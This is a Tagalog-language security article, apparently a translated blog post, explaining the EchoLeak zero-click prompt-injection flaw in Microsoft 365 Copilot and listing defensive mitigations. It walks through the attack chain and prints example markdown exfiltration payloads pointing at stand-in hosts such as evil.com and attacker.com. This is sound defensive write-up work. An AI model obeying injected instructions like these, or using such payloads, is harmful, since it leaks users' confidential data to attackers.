Panimula:
Paano kung hindi ka lang tinutulungan ng iyong Al assistant – kundi tahimik ding tumutulong sa iba?
Ang isang kamakailang zero-click na pagsasamantala na kilala bilang EchoLeak ay nagsiwalat kung paano maaaring manipulahin ang Microsoft 365 Copilot upang i-exfiltrate ang sensitibong impormasyon – nang hindi nagki-click ang user ng link o nagbukas ng email. Ang Microsoft 365 Copilot, ang AI tool na binuo sa mga application sa lugar ng trabaho ng Microsoft Office kabilang ang Word, Excel, Outlook, PowerPoint, at Teams, ay mayroong kritikal na depekto sa seguridad na, ayon sa mga mananaliksik, ay nagpapahiwatig ng mas malawak na panganib na ma-hack ang mga ahente ng AI.
Isipin ang isang pag-atake nang palihim na hindi nangangailangan ng mga pag-click, walang pag-download, walang babala – isang email lang na nakaupo sa iyong inbox. Ito ang EchoLeak, isang kritikal na kahinaan sa Microsoft 365 Copilot na hinahayaan ang mga hacker na magnakaw ng sensitibong data ng korporasyon nang walang aksyon mula sa biktima.
Pangkalahatang-ideya ng Kahinaan:
Sa kaso ng Microsoft 365 Copilot, hinahayaan ng kahinaan ang isang hacker na mag-trigger ng pag-atake sa pamamagitan lamang ng pagpapadala ng email sa isang user, nang hindi kailangan ng phishing o malware. Sa halip, ang pagsasamantala ay gumagamit ng isang serye ng mga matalinong diskarte upang i-on ang AI assistant laban sa sarili nito.
Ang Microsoft 365 Copilot ay kumikilos batay sa mga tagubilin ng user sa loob ng mga Office app upang gawin ang mga bagay tulad ng pag-access ng mga dokumento at gumawa ng mga mungkahi. Kung na-infiltrate ng mga hacker, maaari itong magamit upang i-target ang sensitibong panloob na impormasyon gaya ng mga email, spreadsheet, at chat. Ang pag-atake ay lumalampas sa mga built-in na proteksyon ng Copilot, na idinisenyo upang matiyak na ang mga user lang ang makaka-access ng sarili nilang mga file—na posibleng maglantad ng pagmamay-ari, kumpidensyal, o data na nauugnay sa pagsunod.
Natuklasan ng Aim Security, ito ang unang nakadokumentong zero-click na pag-atake sa isang ahente ng AI, na naglalantad sa mga hindi nakikitang panganib na nakatago sa mga tool ng AI na ginagamit namin araw-araw.
Isang ginawang email lang ang kailangan. Tahimik itong pinoproseso ng Copilot, sinusunod ang mga nakatagong senyas, naghuhukay sa mga panloob na file, at nagpapadala ng kumpidensyal na data, lahat habang lumalampas sa mga panseguridad ng Microsoft, ayon sa post sa blog ng kumpanya.
Sinasamantala ng EchoLeak ang kakayahan ng Copilot na pangasiwaan ang parehong pinagkakatiwalaang internal na data (tulad ng mga email, mga chat sa Teams, at mga OneDrive file) at mga hindi pinagkakatiwalaang external na input, gaya ng mga papasok na email. Nagsisimula ang pag-atake sa isang malisyosong email na naglalaman ng partikular na markdown syntax, “tulad ng ![Image alt text][ref] [ref]: https://www.evil.com?param= .” Kapag awtomatikong ini-scan ng Copilot ang email sa background upang maghanda para sa mga query ng user, nagti-trigger ito ng kahilingan sa browser na nagpapadala ng sensitibong data, gaya ng mga kasaysayan ng chat, mga detalye ng user, o mga panloob na dokumento, sa server ng isang umaatake.
Daloy ng Pag-atake:
Mula sa Prompt to Payload: Paano Ina-hijack ng mga Attacker ang AI Pipeline ng Copilot para Ma-exfiltrate ang Data Nang Walang Isang Pag-click Unawain natin sa ibaba ang detalye!

- Paggawa at Pagpapadala ng Nakakahamak na Input: Magsisimula ang umaatake sa pamamagitan ng pagbubuo ng malisyosong email o dokumento na naglalaman ng nakatagong prompt na kargamento ng pag-iniksyon. Ang payload na ito ay ginawa upang maging invisible o hindi mapapansin ng taong tatanggap ngunit ganap na na-parse at isinasagawa ng Microsoft 365 Copilot sa panahon ng pagpoproseso na tinulungan ng AI. Upang itago ang iniksyon na pagtuturo, ang umaatake ay gumagamit ng iba't ibang stealth technique, gaya ng: HTML na mga komento.
- Pinoproseso ng Copilot ang Mga Nakatagong Tagubilin: Kapag binuksan ng tatanggap ang malisyosong email o dokumento—o gumamit ng Microsoft 365 Copilot upang magsagawa ng mga pagkilos gaya ng pagbubuod ng nilalaman, pagtugon sa mensahe, pag-draft ng tugon, o pag-extract ng mga gawain—awtomatikong kinukuha at sinusuri ng Copilot ang buong input. Dahil sa hindi sapat na pagpapatunay ng input at kakulangan ng agarang paghihiwalay, hindi nakikilala ng Copilot ang pagitan ng lehitimong input ng user at mga tagubiling kontrolado ng attacker na nakatago sa loob ng nilalaman. Sa halip, tinatrato nito ang mga na-inject na prompt bilang bahagi ng nilalayon na set ng pagtuturo ng user. Bilang resulta, isinasagawa ng AI ang mga nakatagong utos Sa yugtong ito, walang kamalay-malay na kumilos si Copilot sa mga tagubilin ng umaatake, na mali ang pagpapakahulugan sa mga ito bilang bahagi ng lehitimong gawain nito—sa gayon ay pinapagana ang susunod na yugto ng pag-atake: pagtagas ng sensitibong panloob na konteksto.
- Ang Copilot ay Bumubuo ng Output na Naglalaman ng Sensitibong Konteksto: Pagkatapos bigyang-kahulugan at isagawa ang nakatagong prompt na ini-inject ng umaatake, ang Microsoft 365 Copilot ay gagawa ng tugon na kinabibilangan ng sensitibong panloob na data, gaya ng itinuro. Ang output na ito ay karaniwang ipinapakita sa paraang mukhang lehitimo sa user ngunit idinisenyo upang patagong i-exfiltrate ang impormasyon. Upang itago ang exfiltration, sinenyasan ang AI (sa pamamagitan ng nakatagong tagubilin) na i-embed ang sensitibong data na ito sa loob ng markdown-formatted hyperlink, halimbawa:
[Mag-click dito para sa higit pang impormasyon](https://attacker.com/exfiltrate?token={{internal_token}})
Para sa gumagamit, ang link ay tila isang kapaki-pakinabang na sanggunian. Sa totoo lang, isa itong maingat na ginawang exfiltration vector, na handang magpadala ng data sa imprastraktura ng umaatake kapag na-access o na-preview ang link.
- Paglikha ng Link sa Server na Kinokontrol ng Attacker: Ang markdown hyperlink na nabuo ng Copilot—sa ilalim ng impluwensya ng injected prompt—ay tumuturo sa isang server na kinokontrol ng attacker. Ang link ay idinisenyo upang mag-embed ng sensitibong data ng konteksto (na-extract sa nakaraang hakbang) nang direkta sa URL, karaniwang gumagamit ng mga parameter ng query o mga variable ng path, gaya ng: https://attacker-domain.com/leak?data={{confidential_info}} o https://exfil.attacker.net/{{internal_token}}
Ang mga link na ito ay madalas na lumilitaw na generic o kapaki-pakinabang, na ginagawang mas malamang na magtaas ng hinala. Ang layunin ng umaatake ay tiyakin na kapag ang link ay na-click, na-preview, o kahit na awtomatikong nakuha, ang panloob na data (tulad ng mga token ng session, nilalaman ng dokumento, o metadata ng pagpapatunay) ay ipinapadala sa kanilang server nang walang anumang nakikitang mga palatandaan ng kompromiso.
- Pag-exfiltration ng Data na Na-trigger ng User Action o System Preview: Kapag ang tugon na nabuo ng Copilot na naglalaman ng nakakahamak na link ay naihatid na sa biktima (o isa pang panloob na user), ang proseso ng pag-exfiltrate ay ma-trigger sa pamamagitan ng alinman sa direktang pakikipag-ugnayan o passive na pag-render. Bilang resulta, ang umaatake ay tumatanggap ng mga kahilingang naglalaman ng mahalagang panloob na impormasyon—gaya ng mga token sa pagpapatotoo, mga snippet ng pag-uusap, o panloob na dokumentasyon—nang walang pinaghihinalaan. Tinatapos nito ang chain ng pag-atake sa isang matagumpay at palihim na pag-exfiltrate ng data.
Mga Hakbang sa Pagbabawas:
Para epektibong ipagtanggol laban sa EchoLeak-style na prompt injection attack sa Microsoft 365 Copilot at mga katulad na AI-powered assistant, kailangan ng mga organisasyon ng layered na diskarte sa seguridad na sumasaklaw sa kontrol ng input, disenyo ng AI system, at mga advanced na kakayahan sa pag-detect.
- Maagap na Paghihiwalay
Ang isa sa mga pinaka-kritikal na pag-iingat ay ang pagtiyak ng tamang agarang paghihiwalay sa loob ng mga AI system. Nangangahulugan ito na dapat na malinaw na makilala ng AI ang pagitan ng nilalamang ibinigay ng user at mga tagubilin sa panloob/antas ng system. Kung wala ang paghihiwalay na ito, anumang na-inject na input — kahit na nakatago gamit ang HTML o markdown — ay maaaring ma-misinterpret ng AI bilang isang command. Ang pagpapatupad ng matatag na mekanismo ng paghihiwalay ay maaaring pigilan ang AI na kumilos sa mga nakakahamak na payload na naka-embed sa tila inosenteng content.
- Input Sanitization at Validation
Ang lahat ng mga input ng user na pinoproseso ng mga AI system ay dapat na mahigpit na nalinis. Kabilang dito ang pagtanggal o pag-neutralize ng mga nakatagong elemento ng HTML tulad ng , mga zero-width na character, base64-encoded na mga tagubilin, at obfuscated markdown. Ang pagpapatunay ng mga URL at pagtanggi sa mga hindi pinagkakatiwalaang domain o mga parameter ng query na mali ang pagkakabuo ay higit na nagpapalakas sa pagtatanggol na ito. Sa pamamagitan ng paglilinis ng input bago ito makita ng AI, nawawalan ng kakayahan ang mga umaatake na magpuslit ng mga mapaminsalang maagang pag-iniksyon.
- Huwag paganahin ang Auto-Render ng Hindi Pinagkakatiwalaang Content
Ang isang pangunahing enabler ng EchoLeak-style exfiltration ay ang awtomatikong pag-render ng mga markdown link at mga preview ng imahe. Dapat i-disable ng mga organisasyon ang functionality na ito, lalo na para sa content mula sa hindi alam o external na source. Ang pagpigil sa mga Copilot o email client mula sa awtomatikong pag-preview ng mga link ay humahadlang sa zero-click na pag-exfiltrate ng data at nagbibigay ng mas maraming oras sa mga security system upang suriin ang payload bago ito maging aktibo.
- Paghihigpit sa Pag-access sa Konteksto
Ang isa pang pangunahing pagpapagaan ay ang limitahan ang data sa konteksto kung saan may access si Copilot o sinumang LLM assistant. Ang mga sensitibong asset tulad ng mga token ng session, kumpidensyal na data ng proyekto, metadata ng pagpapatotoo, at mga panloob na komunikasyon ay hindi dapat maging bahagi ng konteksto ng input ng AI maliban kung kinakailangan. Nililimitahan nito ang saklaw ng kung ano ang maaaring ma-leak kahit na magtagumpay ang isang maagang pag-iniksyon.
- Pagsubaybay at Pag-log ng Output ng AI
Dapat ipatupad ng mga organisasyon ang pag-log at pagsubaybay sa lahat ng content na binuo ng AI, lalo na kapag kasama sa output ang mga dynamic na link, hindi pangkaraniwang buod, o mga rekomendasyong nakaharap sa user. Ang mga pattern tulad ng paulit-ulit na paggamit ng markdown, pagkakaroon ng mga token sa mga hyperlink, o mga prompt na lumalabas na labis na "nakakatulong" ay maaaring magpahiwatig ng pang-aabuso. Ang pagsubaybay sa output na ito ay nagbibigay-daan para sa maagang pagtuklas ng mga pagtatangka sa pag-exfiltration at retroactive na pagsusuri kung may nangyaring paglabag.
- Pagsasanay at Kamalayan ng Gumagamit
Dahil ang mga user ang huling tatanggap ng nilalamang binuo ng AI, mahalagang itaguyod ang kaalaman tungkol sa mga panganib ng pakikipag-ugnayan sa mga link o mensaheng binuo ng AI. Dapat sanayin ang mga empleyado na kilalanin kapag ang isang link o mensahe ay tila "masyadong matalino," hindi karaniwang partikular, o wala sa konteksto. Ang paghikayat sa mga user na mag-ulat ng kahina-hinalang nilalaman—kahit na ito ay nabuo ng isang pinagkakatiwalaang katulong tulad ng Copilot—ay nakakatulong na bumuo ng firewall ng tao laban sa social-engineered na pang-aabuso sa AI.
Magkasama, ang mga hakbang sa pagpapagaan na ito ay bumubuo ng isang komprehensibong diskarte sa pagtatanggol laban sa EchoLeak, na tumutulay sa pagitan ng disenyo ng AI system, kaligtasan ng user, at real-time na pagtuklas ng banta. Sa pamamagitan ng paggamit ng mga kasanayang ito, maaaring manatiling matatag ang mga organisasyon habang umuusbong ang mga banta na nakabatay sa AI.
Sanggunian:
May-akda:
Nandini Seth
Adrip Mukherjee



